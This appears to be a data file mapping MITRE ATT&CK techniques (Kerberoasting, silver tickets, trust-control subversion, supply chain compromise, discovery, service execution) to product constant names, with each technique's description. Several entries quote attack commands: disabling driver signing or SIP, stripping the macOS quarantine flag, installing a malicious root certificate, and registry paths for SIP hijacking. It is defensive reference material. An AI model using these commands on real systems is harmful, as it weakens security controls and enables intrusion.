T1558.003 XDM_CONST.MITRE_TECHNIQUE_STEAL_OR_FORGE_KERBEROS_TICKETS_KERBEROASTING Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016) Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016) This same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015) Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014) https://attack.mitre.org/techniques/T1558/003
T1558.002 XDM_CONST.MITRE_TECHNIQUE_STEAL_OR_FORGE_KERBEROS_TICKETS_SILVER_TICKET Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets) Silver tickets are more limited in scope than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets) Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003). https://attack.mitre.org/techniques/T1558/002
T1553 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site. Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) https://attack.mitre.org/techniques/T1553
T1553.002 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_CODE_SIGNING Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) Code signing certificates may be used to bypass security policies that require signed code to execute on a system. https://attack.mitre.org/techniques/T1553/002
T1553.006 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_CODE_SIGNING_POLICY_MODIFICATION Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP) Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014) To gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader) https://attack.mitre.org/techniques/T1553/006
T1553.001 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_GATEKEEPER_BYPASS Adversaries may modify file attributes that signify programs are from untrusted sources to subvert
Gatekeeper controls in macOS. When documents, applications, or programs are downloaded an extended
attribute (xattr) called com.apple.quarantine can be set on the file by the application performing the
download. This attribute, also known as a quarantine flag, is read by Apple's Gatekeeper defense program
when the file is run and provides a prompt to the user to allow or deny execution. Gatekeeper also monitors
an application's usage of dynamic libraries (dylibs) loaded outside the application folder on any quarantined
binary, often using the dlopen function. If the quarantine flag is set in macOS 10.15+, Gatekeeper also
checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all
unsigned executables.(Citation: TheEclecticLightCompany apple notarization )(Citation: Bypassing
Gatekeeper) The quarantine flag is an opt-in system and not imposed by macOS. If an application opts-in,
a file downloaded from the Internet will be given a quarantine flag before being saved to disk. Any
application or user with write permissions to the file can change or strip the quarantine flag. With elevated
permission (sudo), this attribute can be removed from any file. The presence of the
com.apple.quarantine flag can be checked with the xattr command: xattr -l /path/to/examplefile.
Similarly, this attribute can be recursively removed from all files in a folder using xattr:
sudo xattr -d com.apple.quarantine /path/to/folder.(Citation: 20 macOS Common Tools and
Techniques)(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: theevilbit gatekeeper
bypass 2021) Apps and files loaded onto the system from a USB flash drive, optical disk, external hard
drive, from a drive shared over the local network, or using the curl command do not set this flag.
Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/
techniques/T1189), which may bypass Gatekeeper. (Citation: Methods of Mac Malware Persistence)
(Citation: Clearing quarantine attribute)(Citation: OceanLotus for OS X) https://attack.mitre.org/techniques/
T1553/001
T1553.004 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_INSTALL_ROOT_CERTIFICATE Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to
adversary controlled web servers. Root certificates are used in public key cryptography to identify a root
certificate authority (CA). When a root certificate is installed, the system or application will trust certificates
in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate)
Certificates are commonly used for establishing secure TLS/SSL communications within a web browser.
When a user attempts to browse a website that presents a certificate that is not trusted an error message
will be displayed to warn the user of the security risk. Depending on the security settings, the browser may
not allow the user to establish a connection to the website. Installation of a root certificate on a
compromised system would give an adversary a way to degrade the security of that system. Adversaries
have used this technique to avoid security warnings prompting users when compromised systems connect
over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login
credentials.(Citation: Operation Emmental) Atypical root certificates have also been pre-installed on
systems by the manufacturer or in the software supply chain and were used in conjunction with malware/
adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for
intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)
Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains
will carry many of the same metadata characteristics of the source and can be used to sign malicious code
that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution
and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017) In macOS, the Ay MaMi
malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert
to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see
ay mami 2018) https://attack.mitre.org/techniques/T1553/004
T1553.005 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_MARK_OF_THE_WEB_BYPASS Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows,
when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream
(ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft
Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions.
For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View.
Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares
files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent
the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank
MotW 2020)(Citation: Intezer Russian APT Dec 2020) Adversaries may abuse container files such as
compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that
may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW
but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW
is an NTFS feature and many container files do not support NTFS alternate data streams. After a container
file is extracted and/or mounted, the files contained within them may be treated as local files on disk and
run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020) https://
attack.mitre.org/techniques/T1553/005
T1553.003 XDM_CONST.MITRE_TECHNIQUE_SUBVERT_TRUST_CONTROLS_SIP_AND_TRUST_PROVIDER_HIJACKING Adversaries may tamper with SIP and trust provider components to mislead the operating system and
application control tools when conducting signature validation checks. In user mode, Windows
Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and
integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft
signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust
application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an
inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of
a signature. (Citation: SpectorOps Subverting Trust Sept 2017) Because of the varying executable file types
and corresponding signature formats, Microsoft created software components called Subject Interface
Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API
functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify
signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog
signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified
by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017) Similar to [Code
Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert
trust controls and bypass security policies that allow only legitimately signed code to execute on a system.
Adversaries may hijack SIP and trust provider components to mislead operating system and application
control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the Dll and FuncName Registry values in
HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}
that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which
retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an
exported function that always returns a known good signature value (ex: a Microsoft signature for Portable
Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all
files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur,
invalidating the signature, since the hash returned by the function will not match the value computed from
the file).
* Modifying the Dll and FuncName Registry values in
HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}
that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s
computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported
function that always returns TRUE (indicating that the validation was successful), an adversary can
successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept
2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This
Registry value could also be redirected to a suitable exported function from an already present DLL,
avoiding the requirement to drop and execute a new file on disk.
* Modifying the DLL and Function Registry values in
HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}
that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and
parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s
CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an
already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order
Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious
components may be invoked by any application that performs code signing or signature validation. (Citation:
SpectorOps Subverting Trust Sept 2017) https://attack.mitre.org/techniques/T1553/003
T1195 XDM_CONST.MITRE_TECHNIQUE_SUPPLY_CHAIN_COMPROMISE Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer
for the purpose of data or system compromise. Supply chain compromise can take place at any stage of
the supply chain including:
* Manipulation of development tools
* Manipulation of a development environment
* Manipulation of source code repositories (public or private)
* Manipulation of source code in open-source dependencies
* Manipulation of software update/distribution mechanisms
* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware)
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
While supply chain
compromise can impact any component of hardware or software, attackers looking to gain execution have
often focused on malicious additions to legitimate software in software distribution or update channels.
(Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011)
Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious
software may be distributed to a broad set of consumers but only move on to additional tactics on specific
victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects
that are used as dependencies in many applications may also be targeted as a means to add malicious
code to users of the dependency. (Citation: Trendmicro NPM Compromise) https://attack.mitre.org/
techniques/T1195
T1195.003 XDM_CONST.MITRE_TECHNIQUE_SUPPLY_CHAIN_COMPROMISE_COMPROMISE_HARDWARE_SUPPLY_CHAIN Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the
purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries
can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high
degree of control over the system. Hardware backdoors may be inserted into various devices, such as
servers, workstations, network infrastructure, or peripherals. https://attack.mitre.org/techniques/T1195/003
T1195.001 XDM_CONST.MITRE_TECHNIQUE_MITRE_TECHNIQUE_SUPPLY_CHAIN_COMPROMISE_COMPROMISE_SOFTWARE_DEPENDENCIES_AND_DEVELOPMENT_TOOLS Adversaries may manipulate software dependencies and development tools prior to receipt by a final
consumer for the purpose of data or system compromise. Applications often depend on external software to
function properly. Popular open source projects that are used as dependencies in many applications may
be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM
Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of
consumers but only move on to additional tactics on specific victims. https://attack.mitre.org/techniques/
T1195/001
T1195.002 XDM_CONST.MITRE_TECHNIQUE_SUPPLY_CHAIN_COMPROMISE_COMPROMISE_SOFTWARE_SUPPLY_CHAIN Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of
data or system compromise. Supply chain compromise of software can take place in a number of ways,
including manipulation of the application source code, manipulation of the update/distribution mechanism
for that software, or replacing compiled releases with a modified version. Targeting may be specific to a
desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics
on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) https://
attack.mitre.org/techniques/T1195/002
T1082 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_INFORMATION_DISCOVERY An adversary may attempt to get detailed information about the operating system and hardware, including
version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from
[System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to
shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts
specific actions. Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather
detailed system information. If running with privileged access, a breakdown of system data can be gathered
through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access
can execute the df -aH command to obtain currently mounted disks and associated freely available space.
[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information
gathered from other forms of discovery and reconnaissance can drive payload development and
concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) Infrastructure
as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual
machine information via APIs. Successful authenticated API calls can return data such as the operating
system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon
Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) https://
attack.mitre.org/techniques/T1082
T1614 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_LOCATION_DISCOVERY Adversaries may gather information in an attempt to calculate the geographical location of a victim host.
Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/
T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary
fully infects the target and/or attempts specific actions. Adversaries may attempt to infer the location of a
system using various system checks, such as time zone, keyboard layout, and/or language settings.
(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT
malware 2020) Windows API functions such as GetLocaleInfoW can also be used to determine the locale
of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may
also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance
Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021) Adversaries may also attempt to
infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.
(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016) https://attack.mitre.org/
techniques/T1614
T1614.001 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_LOCATION_DISCOVERY_SYSTEM_LANGUAGE_DISCOVERY Adversaries may attempt to gather information about the system language of a victim in order to infer the
geographical location of that host. This information may be used to shape follow-on behaviors, including
whether the adversary infects the target and/or attempts specific actions. This decision may be employed
by malware developers and operators to reduce their risk of attracting the attention of specific law
enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language
Check) There are various sources of data an adversary could use to infer system language, such as
system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but
may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to
[Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019)
For example, on a Windows system adversaries may attempt to infer the language of a system by querying
the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language or parsing
the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage,
GetKeyboardLayoutList and GetUserDefaultLangID.(Citation: Darkside Ransomware Cybereason)
(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018) On a macOS or
Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.
https://attack.mitre.org/techniques/T1614/001
T1016 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_NETWORK_CONFIGURATION_DISCOVERY Adversaries may look for details about the network configuration and settings, such as IP and/or MAC
addresses, of systems they access or through information discovery of remote systems. Several operating
system administration utilities exist that can be used to gather this information. Examples include [Arp]
(https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://
attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://
attack.mitre.org/software/S0103). Adversaries may use the information from [System Network Configuration
Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on
behaviors, including determining certain access within the target network and what actions to do next.
https://attack.mitre.org/techniques/T1016
T1016.001 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_NETWORK_CONFIGURATION_DISCOVERY_INTERNET_CONNECTION_DISCOVERY Adversaries may check for Internet connectivity on compromised systems. This may be performed during
automated discovery and can be accomplished in numerous ways such as using [Ping](https://
attack.mitre.org/software/S0097), tracert, and GET requests to websites. Adversaries may use the results
and responses from these requests to determine if the system is capable of communicating with their C2
servers before attempting to connect to them. The results may also be used to identify routes, redirectors,
and proxy servers. https://attack.mitre.org/techniques/T1016/001
T1049 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_NETWORK_CONNECTIONS_DISCOVERY Adversaries may attempt to get a listing of network connections to or from the compromised system they
are currently accessing or from remote systems by querying for information over the network. An adversary
who gains access to a system that is part of a cloud-based environment may map out Virtual Private
Clouds or Virtual Networks in order to determine what systems and services are connected. The actions
performed are likely the same types of discovery techniques depending on the operating system, but the
resulting information may include details about the networked cloud environment relevant to the adversary's
goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon
AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview)
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/
S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux,
[netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a
and w can be used to show which users are currently logged in, similar to "net session". https://
attack.mitre.org/techniques/T1049
T1033 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_OWNER_USER_DISCOVERY Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly
uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving
account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The
information may be collected in a number of different ways using other Discovery techniques, because user
and username details are prevalent throughout a system and include running process ownership, file/
directory ownership, session information, and system logs. Adversaries may use the information from
[System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to
shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts
specific actions. Various utilities and commands may acquire this information, including whoami. In macOS
and Linux, the currently logged in user can be identified with w and who. On macOS the
dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables,
such as %USERNAME% and $USER, may also be used to access this information. https://attack.mitre.org/
techniques/T1033
T1007 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_SERVICE_DISCOVERY Adversaries may try to get information about registered services. Commands that may obtain information
about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://
attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but
adversaries may also use other tools as well. Adversaries may use the information from [System Service
Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on
behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
https://attack.mitre.org/techniques/T1007
T1569 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_SERVICES Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can
execute malicious content by interacting with or creating services either locally or remotely. Many services
are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://
attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary
execution. https://attack.mitre.org/techniques/T1569
T1569.001 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_SERVICES_LAUNCHCTL Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd,
the service management framework for macOS. Launchctl supports taking subcommands on the
command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man) Adversaries
use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/
T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands
include: launchctl load, launchctl unload, and launchctl start. Adversaries can use scripts or
manually run the commands launchctl load -w "%s/Library/LaunchAgents/%s" or /bin/launchctl load
to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon]
(https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS
Common Tools and Techniques) https://attack.mitre.org/techniques/T1569/001
T1569.002 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_SERVICES_SERVICE_EXECUTION Adversaries may abuse the Windows service control manager to execute malicious commands or
payloads. The Windows service control manager (services.exe) is an interface to manage and
manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is
accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://
attack.mitre.org/software/S0039). [PsExec](https://attack.mitre.org/software/S0029) can also be used to
execute commands or payloads via a temporary Windows service created through the service control
manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/
S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote
execution. Adversaries may leverage these mechanisms to execute malicious content. This can be done by
either executing a new or modified service. This technique is the execution used in conjunction with
[Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege
escalation. https://attack.mitre.org/techniques/T1569/002
T1529 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_SHUTDOWN_OR_REBOOT Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those
systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some
cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation:
Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer
resources for legitimate users. Adversaries may attempt to shutdown/reboot a system after impacting it in
other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System
Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.
(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018) https://attack.mitre.org/
techniques/T1529
T1124 XDM_CONST.MITRE_TECHNIQUE_SYSTEM_TIME_DISCOVERY An adversary may gather the system time and/or time zone from a local or remote system. The system time
is set and stored by the Windows Time Service within a domain to maintain time synchronization between
systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows
Time Service) System time information may be gathered in a number of ways, such as with [Net](https://
attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system
time on a remote system. The victim's time zone may also be inferred from the current system time or
gathered by using w32tm /tz. (Citation: Technet Windows Time Service) This information could be useful
for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://
attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information
based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/
techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or
delaying execution until a specified date/time.(Citation: AnyRun TimeBomb) https://attack.mitre.org/
techniques/T1124
T1080 XDM_CONST.MITRE_TECHNIQUE_TAINT_SHARED_CONTENT
Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally. A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot) Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.
https://attack.mitre.org/techniques/T1080
T1221 XDM_CONST.MITRE_TECHNIQUE_TEMPLATE_INJECTION
